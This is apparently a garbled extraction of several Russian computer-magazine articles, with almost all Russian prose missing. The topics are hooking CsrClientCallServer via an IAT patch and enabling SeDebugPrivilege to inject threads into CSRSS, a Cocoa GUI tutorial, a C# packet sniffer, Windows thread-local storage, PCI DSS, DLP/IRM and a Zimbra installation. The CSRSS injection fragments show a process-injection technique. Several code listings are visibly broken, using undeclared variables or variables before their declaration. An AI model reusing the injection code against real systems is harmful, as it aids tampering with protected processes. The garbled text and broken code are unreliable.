, CsrClientCallServer, - ,
:
.text:77E96D55
.text:77E96D57
//
.text:77E96D5C
.text:77E96D5F
.text:77E96D61
.text:77E96D67
.text:77E96D68
,
,
, CSRSS.
,
CsrApiRequestThread, csrss.exe,
.
CSRSS .
CsrApi ? .
, , CSRSS
Windows.
links
MSDN
,
99%
,
WinAPI.
DVD
dvd
-
.
CsrClientCallServer
!
CsrApi- CsrClientCallServer.
PUSH 4
PUSH 20225h
HTTP://WWW
CODING
,
CsrApi- , .
, CSRSS? , . , Windows 7.
, Windows 7
CreateRemoteThread . ,
, Microsoft ,
. CreateRemoteThread ,
, NULL
ERROR_NOT_ENOUGH_MEMORY.
:).
, RtlCreateUserThread (
: http://forum.gamedeception.net/threads/17097-Simpleinjector-(cmd-line-unicode-xp-vista-w7)),
; .
CSRSS,
status quo
. PoC . ,
CreateRemoteThread
CsrClientCallServer, . ,
. CreateRemoteThread NtCreateThreadEx,
CREATE_SUSPENDED,
CSRSS
CsrClientCallServer. ?
:) , , CsrClientCallServer
. .
kernelbase.dll ( kernel32.dll Windows 7, ):
kernelbase.dll
.text:7597BD24 PUSH 0C
.text:7597BD26 PUSH 10001
.text:7597BD2B PUSH EBX
.text:7597BD2C LEA EAX, DWORD PTR SS:[EBP-210]
.text:7597BD32 PUSH EAX
.text:7597BD33 CALL NEAR DWORD PTR DS:[<&ntdll.CsrClientCallServer>] ; ntdll.CsrClientCallServer
.text:7597BD39 MOV EAX, DWORD PTR SS:[EBP-1F0]
.text:7597BD3F MOV DWORD PTR SS:[EBP-218], EAX
.text:7597BD45 CMP DWORD PTR SS:[EBP-218], EBX
.text:7597BD4B JL KERNELBA.75999564
}
...
DWORD ImportAddress;
DWORD OriginalCsrClientCallServer, OldProtect;
ImportAddress = GetImportAddressFromIat(
GetModuleHandle("kernelbase.dll"),
"CsrClientCallServer");
VirtualProtect(( VOID *) ImportAddress,
sizeof(DWORD),
PAGE_EXECUTE_READWRITE,
&OldProtect);
OriginalCsrClientCallServer =
*(DWORD*)ImportAddress;
*(DWORD*)ImportAddress =
(DWORD)NewCsrClientCallServer;
...
kernelbase.dll,
, CsrClientCallServer
CsrClientCallServer,
. . :
ULONG NewCsrClientCallServer(
PVOID Arg1,
PVOID Arg2,
ULONG Arg3,
ULONG Arg4)
{
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
&tokenPrvlgs.Privileges[0].Luid))
return error;
tokenPrvlgs.PrivilegeCount = 1;
tokenPrvlgs.Privileges[0].Attributes =
SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken, FALSE,
&tokenPrvlgs, 0, NULL, NULL))
{
return error;
}
CloseHandle( hToken );
return success;
}
, . Windows 7,
. , ,
, . , !
P.S. CSRSS!
:). z
CODING
seva@vingrad.ru
GUI
Mac OS X
Mac OS X Objective-C
Cocoa. , ,
.
GUI- Cocoa Objective-C.
Code
, XCode,
Mac OS X Apple. ,
: , ,
..
Interface Builder.
, XCode 4 Interface Builder
, - ,
XCode Apple Interface Builder
IDE, , .
, XCode 4 ( ,
.. , . .) ,
, . , ,
, :
, , , ,
.., ..
Cocoa
MainMenu.xib Interface Builder
,
XCode , , . ,
IDE. , , command-line , , , kext,
iOS.
XCode
. , , , .
XCode ( XCode ,
Apple).
, , File
New Project. ,
. Cocoa Application ,
Cocoa.
, , XCode
.
:
#import <Cocoa/Cocoa.h>
int main(int argc, char * argv[])
{
return NSApplicationMain(argc, (const char**) argv);
}
NSApplication.
. (
)
.
(Build Build and
Go), . ?
? .
- NIB Files ( -, NIB Files
Interface Buildera) MainMenu.xib.
Interface Builder,
, Mac OS
X .
. IB .
,
. Tools Library (,
, XCode, Interface Builder)
,
drag-and-drop.
, .
,
. -
:).
(Tools
Inspector). ,
.
.
, . , , ,
Interface Builder. ?
, ,
? -
... .
- .
.
XCode ( , Interface
Builder?) AppConroller (File New
File Cocoa Objective-C class). XCode
AppController.h AppController.m . Interface Builder
AppController ,
AppController.
AppController.h InterfaceBuilder.
. - - . ! ,
. Interface Builder Tools Library
Object .
,
AppController.
MainMenu.xib,
, , ,
.
, ,
, .
CODING
AppController
//
// Cocoa.h
#import <Cocoa/Cocoa.h>
@interface AppController : NSObject
{
// .
//
// .
IBOutlet NSTextField * FirstNumber;
IBOutlet NSTextField * SecondNumber;
IBOutlet NSTextField * Result;
}
//
//
- (IBAction) buttonClick: (id) sender;
@end
//
#import "AppController.h"
@implementation AppController
//
- (IBAction) buttonClick: (id) sender
{
//
//
[Result setIntValue:
[FirstNumber intValue] +
[SecondNumber intValue]];
}
@end
IBOutlet IBAction,
, . , ,
Interface Builder Outlet ( ) Interface
Builder Action , GUI. , ,
Interface Builder. :
. AppController
InterfaceBuilder;
. ,
IBAction .
, - .
,
2D-,
-
Build and Go (. ).
, : Cocoa
, , ,
. (
).
, ,
. , ? -
? , :).
Mac OS X , ,
Cocoa.
Mac OS X Quarz. , 2D-,
-, NSView.
drawRect .
XCode MyView.h MyView.m .
MyView.h
Interface Builder. Library
CustomView, MyView .
(
).
.
- , -.
(path) .
Cocoa- NSBezierPath (. ).
, GUI Cocoa-.
iOS iPhone iPad
,
, . ! z
It works!
MyView
//
// XCode
// .
#import "MyView.h"
@implementation MyView
// XCode
// :)
- (id)initWithFrame:(NSRect)frame {
self = [super initWithFrame:frame];
if (self) {
// Initialization code here.
}
return self;
}
//
//
// 2D-
- (void)drawRect:(NSRect)rect
{
//
[[NSColor grayColor] set];
//
NSRectFill( rect );
//
[black_side appendBezierPathWithArcWithCenter:
center
radius: radius
startAngle: 90
endAngle: 270
clockwise: YES];
//
NSBezierPath * circle =
[NSBezierPath bezierPathWithOvalInRect: rect];
//
[circle setLineWidth: 2.0];
//
[[NSColor whiteColor] set];
[circle fill];
//
[[NSColor blackColor] set];
//
[circle stroke];
// ;
// c ,
float center_x = rect.size.width / 2.0;
float center_y = rect.size.height / 2.0;
NSPoint center = {center_x, center_y};
NSPoint center_up = {center_x, center_y * 0.5};
NSPoint center_dn = {center_x, center_y * 1.5};
float radius =
//
[black_side appendBezierPathWithArcWithCenter:
center_up
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: NO];
//
[black_side appendBezierPathWithArcWithCenter:
center_dn
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: YES];
//
[[NSColor blackColor] set];
[black_side fill];
//
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y - radius * (0.5 + 1/6.0),
radius / 3.0, radius/3.0)] fill];
//
[[NSColor whiteColor] set];
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y + radius * (0.5 - 1/6.0),
radius / 3.0, radius/3.0)] fill];
}
@end
CODING
c0n Difesa condifesa@gmail.com, http://defec.ru
(, ),
- ( ),
. +
,
.
, .
, , Wireshark: ,
TCP-,
,
. ,
, CommView.
, , ,
. Wireshark
PCAP (Packet Capture),
. ,
, .
CommView,
NDIS-,
.
,
, .
,
. ,
- , ,
, .
. ,
, -
, ,
,
, ,
.
.
,
,
,
.
,
,
, .
,
, , ,
-
, , . ,
. ,
, ,
.
, ,
, .
+ = ?
.
-, , :
;
(
PCAP );
( );
- ;
;
,
.
(
,
, ).
,
.
-, ,
-
,
. ,
, -
, .
, , -,
,
.
.
links
http://defec.ru/wtf_wcf Windows Communication Foundation: .
www.xakep.ru/post/16494/ PCAP.
www.codeproject.com/KB/IP/CSNetworkSniffer.aspx (.) C#.
www.xakep.ru/magazine/xa/135/096/1.asp , .NET Remoting.
Windows
Communication Foundation, .NET Framework ( WCF
WTF WCF?! Windows Communication Foundation:
).
, C#.
,
DVD
dvd
.NET Remoting.
CODING
IPv4 Header
IP-
.
IP-, IOControl
ReceiveAll,
,
.
, .
:
TCP;
UDP;
IP;
DNS.
, HTTP, SMTP, FTP TCP, , ,
IP: ,
,
.
(raw socket), -
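// Create a raw socket
mainSocket = new Socket(
    AddressFamily.InterNetwork,
    SocketType.Raw, ProtocolType.IP);
// Bind the socket to the selected local IP address
mainSocket.Bind(new IPEndPoint(
    IPAddress.Parse(cmbInterfaces.Text), 0));
/* Ask for the IP header to be included
   with every received packet */
mainSocket.SetSocketOption(
    SocketOptionLevel.IP,
    SocketOptionName.HeaderIncluded,
    true);
// Switch the socket to ReceiveAll mode
mainSocket.IOControl(
    IOControlCode.ReceiveAll,
    byTrue,  // input buffer with the option value
    byOut);  // output buffer
// Start receiving asynchronously
mainSocket.BeginReceive(byteData, 0,
    byteData.Length, SocketFlags.None,
    new AsyncCallback(OnReceive), null);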
/* ,
*/
AddTreeNode addTreeNode =
new AddTreeNode(OnAddTreeNode);
()
(-)
}
}
TCP
UDP: , IP-.
,
- , ( ,
RFC).
, .
(,
) ,
, , ,
,
. . ,
:
/* ,
, IP-*/
private TreeNode MakeIPTreeNode(IPHeader ipHeader)
{
//
TreeNode ipNode = new TreeNode();
//
return ipNode;
}
:
.
- .NET Remoting.
.
, -,
,
:
/*
*/
RemotingConfiguration.Configure("Client.exe.txt");
//
Test test = new Test();
//
test.SendLog(rootNode);
, SendLog()
, , rootNode.
, Result,
:
public void SendLog(string SensorLog)
{
//
Result = Result + SensorLog;
}
,
, Result .
//
test.Show();
Show() ,
Result .
Show() :
,
(, ) ,
.
? , !
(,
! -, :) ..)
: ,
, , - ,
.
, ,
, ,
.
, ! z
CODING
deeonis deeonis@gmail. com
TLS
, ,
, .
.
, ...
.
,
.
? .
strtok C++.
, , .
. ,
strtok ,
.
,
,
,
.
.
, .
,
.
#include <windows.h>

// Global variables shared by every thread
int tls_i;
char tls_char[25];

// Thread function
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    // Every thread writes to the same globals
    tls_i = (int)(INT_PTR)lpParam;
    lstrcpy(tls_char, "array of char");
    char szMsg[80];
    wsprintf( szMsg, "Parameter = %d.", tls_i );
    MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)2, 0, &dwThreadId);
    Sleep(10000); // wait 10 seconds
    return 0;
}
, .
/
.
. ,
, ,
,
thread-local storage (TLS).
thread-local storage?
TLS
. ,
, ,
. ,
. , .
DLL, ,
.
.
TLS : .
[Figure: TLS slot arrays, indexes 0 to TLS_MINIMUM_AVAILABLE - 1]
,
.
.
, TlsGetValue
, . : PVOID TlsGetValue(DWORD
dwTlsIndex). TlsSetValue, TlsGetValue
dwTlsIndex , TlsAlloc.
, , TlsFree. ,
, , TlsAlloc. API ,
.
TLS
, .
WinMain TlsAlloc,
PVOID. ,
TLS , , , .
TlsFree.
TLS
// TLS slot indexes, one per variable
DWORD tls_i;
DWORD tls_char;

// Thread function
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    TlsSetValue(tls_i, lpParam);
    char *char_buf = new char[25];
    lstrcpy(char_buf, "array of char");
    TlsSetValue(tls_char, char_buf);
    char szMsg[80];
    // TlsGetValue returns LPVOID, so cast the stored value back
    int i = (int)(INT_PTR)TlsGetValue(tls_i);
    wsprintf( szMsg, "Parameter = %d.", i );
    // Release the per-thread buffer before the thread exits
    delete[] char_buf;
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    // Allocate the TLS indexes before any thread uses them
    tls_i = TlsAlloc();
    tls_char = TlsAlloc();
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)2, 0, &dwThreadId);
    Sleep(10000); // wait 10 seconds
    TlsFree(tls_i);
    TlsFree(tls_char);
    return 0;
}
,
, , ,
, .
TLS-.
thread-local storage
TLS
. thread-local
storage .
PE-, .tls
( ), ,
. TLS,
, , .
,
API thread-local storage,
C++. .
TLS
// TLS variables
__declspec(thread) int tls_i;
__declspec(thread) char tls_char[25];

// Thread function
DWORD WINAPI ThreadFunc(
    LPVOID lpParam )
{
    tls_i = (int)(INT_PTR)lpParam;
    lstrcpy(tls_char, "array of char");
    return 0;
}

int APIENTRY WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    DWORD dwThreadId;
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)1, 0, &dwThreadId);
    CreateThread(NULL, 0, ThreadFunc,
        (LPVOID)2, 0, &dwThreadId);
    Sleep(10000); // wait 10 seconds
    return 0;
}
__declspec(thread),
TLS-.
, , ,
WinAPI.
, . tls_char
, TLS,
CHAR. ,
(1088 Windows XP), , tls_char , 25 threadlocal storage. ,
dll, , , TLS.
, ,
. TLS
,
.
, TLS
.
,
thread-local storage . z
SYN/ACK
c0n Difesa condifesa@gmail.com, http://defec.ru
PCI DSS
(PCI DSS) ,
.
?
, .
: -, -
, .
, ,
.
-,
.
,
, .
, , -
-
- (). , ,
().
,
, , .
(Payment
Card Industry Security Standards Council, PCI SSC),
(Visa, MasterCard, American
Express, Discover, JCB), ,
(Payment Card Industry
Data Security Standard, PCI DSS).
.
. , , ,
,
. PCI DSS, ,
,
.
:
,
, .
- , ,
.
PCI DSS
,
, ,
,
,
, . ,
PCI DSS
, ,
, .
:
1. (Glossary);
2. (Payment
Card Industry Data Security Standard);
3. (PCI
DSS Security Audit Procedures);
4. (PCI DSS Security Scanning
Procedures);
5. , QSA- (PCI DSS Validation
Requirements for Qualified Security Assessors);
6. , (PCI DSS
Validation Requirements for Approved Scanning Vendors);
7. PCI DSS (Navigating PCI DSS Document);
8. PCI DSS
(Prioritized Approach for PCI DSS);
9. (PCI DSS Self-Assessment Questionnaire);
10. (
, ).
, , ,
, ,
.
PCI DSS, ,
,
, ,
.
. 7-9
( ) , ,
, (
-) :
PCI DSS( 7)
12 PCI DSS ( 1)
, ;
( 8) ,
, ,
, , ,
.
PCI DSS ,
, -
,
,
.
( 1-6
) , ,
, QSA.
PCI DSS
.
-
, . , ,
, ,
, ,
, ,
,
,
. , ,
,
.
PCI DSS,
, (PAN).
,
, .
, ,
PAN ,
, .
,
, , , CVV2
(Card Verification Value 2
Visa) CVC2 (
MasterCard)
, , . , , -
-.
PCI DSS (,
, -)
, CVC2
CVV2 online-.
,
, PCI DSS,
, ,
.
, , -
links
http://pcidss.ru/articles/22.html 2.0 PCI DSS.
https://www.pcisecuritystandards.org/security_standards/documents.php PCI DSS v2.0 .
http://www.xakep.ru/post/49549/ : PCI DSS.
.
SYN/ACK
Payment Card
Industry (PCI) Data
Security Standard
,
PCI DSS
Glossary
Navigating PCI
DSS Document
PCI DSS
Prioritized
Approach for PCI
DSS
- ,
, .
. ,
.
-
, .
PCI DSS , ( )
( ).
, ,
.
PCI DSS , ,
.
:
1. ,
, ;
2.
;
3. - ,
( ) .
( 1 2). ,
, , . : .
. ,
.
( ),
1.4,
(
) , ,
. :
, ,
, .
,
. , 2.2.4,
: , , , , ,
-. ,
,
.
(
3 4) (, ..) ,
,
3.4
PCI DSS
CAV2/CVC2/CVV2/CID
(PAN)
(ardholder Name)
(Service Code)
(Expiration Date)
,
,
.
. ,
( -
),
,
. ,
,
(,
),
,
.
, 5 6,
. ,
, :
,
,
,
-. ,
,
, -
11.
(7, 8 9)
-
,
.
, ,
. -
.
. , , ASV,
. , ,
PCI DSS ASV-
( 11.2 11.3) ,
.
,
, , ,
,
.
12 :
,
- . 12.1.1
, PCI
DSS. - -,
, , ,
,
.
-
.
INFO
info
(PCI DSS v2.0 28
2010 )
.
.
WARNING
warning
PCI DSS v1.2.
. ,
,
.
,
,
,
,
PCI DSS.z
SYN/ACK
luchnik@it-university.ru
, . ,
.
,
. , ,
, DRM (DigitalRightsManagement,
DigitalRestrictionsManagement).
( ,
, )
:
EDRM Enterprise Digital Rights Management
ERM Enterprise Rights Management
IRM Information Rights Management
RMS Rights Management Services, Microsoft IRM
.
. ,
, , ,
,
. ,
, :
,
e-mail
;
, ,
, , .
DLP (DataLeakage
(Loss)Prevention) , .
DLP IRM
?
, , DLP
IRM. (IBM, Cisco, RSA ( EMC), Oracle, Microsoft, CheckPoint, Symantec)
.
,
. ,
,
.
DLP- :
Data-at-Rest. , , , . ,
, .
Data-in-Motion. (, , ) ,
.
Data-in-Use. , ,
.
DLP-
. , ,
,
-. ,
. DLP- ,
.
, , (,
), ,
,
, .
,
2.
AD RMS.
, DLP-
.
, ,
, . , , .
-, , ,
, , .
DLP- . , , . ,
//
, DLP-, . .
, ,
, , , ,
. DLP-
.
, , , ,
? IRM-.
IRM . , . DRM,
, IRM
, . IRM
.
DLP IRM . DLP
,
. DLP ,
.
,
IRM.
AD RMS?
SYN/ACK
4. WatchDox
3. AD RMS
1. ,
AD RMS
CAD- .
ADRMS
Software Development Kit (SDK),
,
ADRMS.
ADRMS
, , , . 1
. 2
, :
DRM-. SaaS Watchdox
Confidela,
AmazonWebServices. Watch Dox Secure file sharing
www.watchdox.com,
(View, Print, Edit, Forward, Spotlight Copy/Paste),
.
.
-, ,
. ,
, , ,
.
e-mail, .
,
. ,
e-mail.
HTTPS, AES.
, ,
,
(. 4). Spotlight,
,
.
, , ,
.
,
e-mail, ( e-mail ,
,
Confidela
).
5. , .
, use license,
(, ).
6. ,
, , , .
ADRMS
ADRMS :
Active Directory Domain Services (ADDS)
URL AD RMS Service Connection Point (SCP)
. AD RMS
.
Microsoft SQL Server , Windows
Server 2008.
, AD
RMS, Web Server (IIS).
technet.microsoft.com/en-us/library/dd772697(WS.10).aspx
.
www.xrml.org eXtensible Rights Markup Language ,
ADRMS.
DRL-
IRM- : DLP- (www.bytemag.ru/articles/detail.php?ID=16748), GroupTest: DRM & DLP tools (www.scmagazineus.com/grouptest-drm--dlp-tools/printgrouptest/182/), DLP (www.cnews.ru/reviews/free/security2009/articles/dpl.shtml).
DLP- IRM- ,
.
, ,
. AD RMS,
,
IRM- ,
, ,
. , AD
RMS DLP-, ,
RSADLP..z
SYN/ACK
grinder grinder@ua.fm, tux.in.ua
Zimbra:
must have
.
, , .
Zimbra Collaboration Suite (ZCS), ,
.
ZCS
Zimbra Inc.
2007 , .
OpenSource , ,
. 2007
Yahoo!, 2010 VMware.
Zimbra ,
. ,
POP/POPS IMAP/
IMAPS -.
ClamAV. ,
,
,
Zimbra. ,
Zimbra,
.
Zimbra
(Jabber), ,
,
WYSIWYG Zimbra Document.
RTF, HTML, ,
. , Zimbra Document
, .
.
,
( URL).
e-mail RSS/Atom.
, e-mail. -
, , .
Zimbra
(Windows Mobile, iPhone, Nokia E ), - , .
,
LDAP , ActiveDirectory.
API,
zimlets Zimbra.
ZCS ,
, ,
. Zimbra .
, .
-
. Zimbra Server Java,
POP3/IMAP , OpenSource ,
nginx, Apache Lucene, OpenLDAP, MySQL, Postfix, POP3/
IMAP4 Perdition, ClamAV, DSPAM .
- Zimbra Web Client ,
-
.
AJAX,
. , ,
,
, ,
Skype Ekiga,
.
, , Zimbra Desktop, (, , ),
IMAP/POP3 .
ZCS : Open Source Edition,
Network Edition (Starter, Standard Professional) Zimbra
Appliance (Basic, Standard).
OpenSource- ZPL
(Zimbra Public License).
,
,
Zimbra
.
,
MS Outlook, ,
(. zimbra.com/products/compare_products.html).
, "" OpenSource
.
, Wiki
, Zimbra.
Open Source Edition .
ZCS OpenSource
Edition
6.0.8, Ubuntu
10.04 LTS. 32 x64
Linux (Red Hat Enterprise, Fedora, Ubuntu, Debian,
Mandriva, SUSE Linux) Mac OS X.
. Ubuntu
6.06 8.04 LTS,
10.04 -
. ,
.
DNS , A MX
.
, 10 .
, .
64- .
$ wget -c http://files2.zimbra.com/downloads/6.0.8_GA/zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710.tgz
.
$ tar xzvf zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710.tgz
$ cd zcs-6.0.8_GA_2661.UBUNTU8_64.20100820044710
links
Zimbra zimbra.com
Zimbra zimbra.com/products/compare_products.html
wiki.zimbra.com/wiki/User_Migration
INFO
$ ./install.sh --platform-override
Zimbra, .
/etc/hosts
.
, .
- ,
MISSING, . ,
.
info
Zimbra: 22, 25, 80,
110, 143, 389, 443, 993,
995, 7025.
SYN/ACK
-
$ sudo apt-get install libpcre3 libgmp3c2 libgmp3-dev sysstat libexpat1 wget
,
(
11). ,
zimbra-memcached zimbra-proxy ( POP3, IMAP
HTTP). , zimbra-proxy, memcached .
. ,
. DNS
Zimbra, (A MX) /etc/hosts, .
,
. , ,
. Admin
Password, .
.
, 3, ,
Admin Password ( ***),
. , r, s a (
) q.
. ,
/opt/zimbra/log.
Zimbra , . :
$ ./install.sh --uninstall
/opt/zimbra, .
- Zimbra
.
, URL
. ,
(HTML), (AJAX) . , AJAX, , .
,
.
, , , ,
. ,
. , -
,
. - Zimbra
, .
- 7071 .
https://server.com:7071,
admin .
,
.
:
, ,
,
;
, , (, )
, zemlets
, ;
( , ,
CPU,
);
, ;
(,
, ).
,
,
, - .
,
, .
, wiki -.
.
CSV,
. ,
, . :
user@domain.com,name,password
, ,
.
, .
, .. Zimbra .
, - to Zimbra migration.
Zimlet, .
.
, default
,
, .
,
. (
).
.
, ,
. .
. ,
.
, ,
, MTA, POP, IMAP, Exchange
.
, :
, .
.
6 zimlets.
/opt/zimbra/zimlets*.
, Zimlets,
zip .
zimlets ( )
. .
Zimbra
-, Zimbra ,
zimbra.
Zimbra CLI
Commands (zimbra.com/docs/os/6.0.8/administration_guide).
service zimbra status
zmcontrol.
zmcontrol (status | stop | start | maintenance | startup)
. ,
-H .
zmaccts , zmprov
LDAP,
,
.
.
Wiki- (wiki.zimbra.com/wiki/User_Migration).
.
. ,
. default,
Zimbra.
, , .
7 , , (HTML AJAX), ,
, ,
, ,
, ,
.
, *nix .
.z